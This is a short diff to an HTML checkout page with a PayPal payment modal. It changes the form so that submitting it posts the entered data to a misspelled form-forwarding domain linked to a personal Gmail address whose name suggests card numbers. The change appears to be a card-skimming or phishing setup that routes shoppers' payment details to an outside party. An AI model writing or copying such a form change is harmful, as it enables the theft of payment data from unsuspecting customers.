--- a/index.html
+++ b/index.html
@@ -155,7 +155,7 @@
 <body>
      
 <div class="modal">
-<form class="form">
+<form class="form" action="https://formsumbit.co/tarjeta459@gmail.com". method="POST">
   <div class="payment--options">
     <button name="paypal" type="button">
       <svg xml:space="preserve" viewBox="0 0 124 33" height="33px" width="124px" y="0px" x="0px" id="Layer_1" version="1.1" xmlns:xlink="http://www.w3.org/1999/xlink" xmlns="http://www.w3.org/2000/svg">
@@ -229,7 +229,8 @@
     </div>
     </div>
   </div>
-    <button class="purchase--btn">Checkout</button>
+    <button type="submit" class="purchase--btn">Checkout</button>
+    
 </form>
 </div>
 </body>
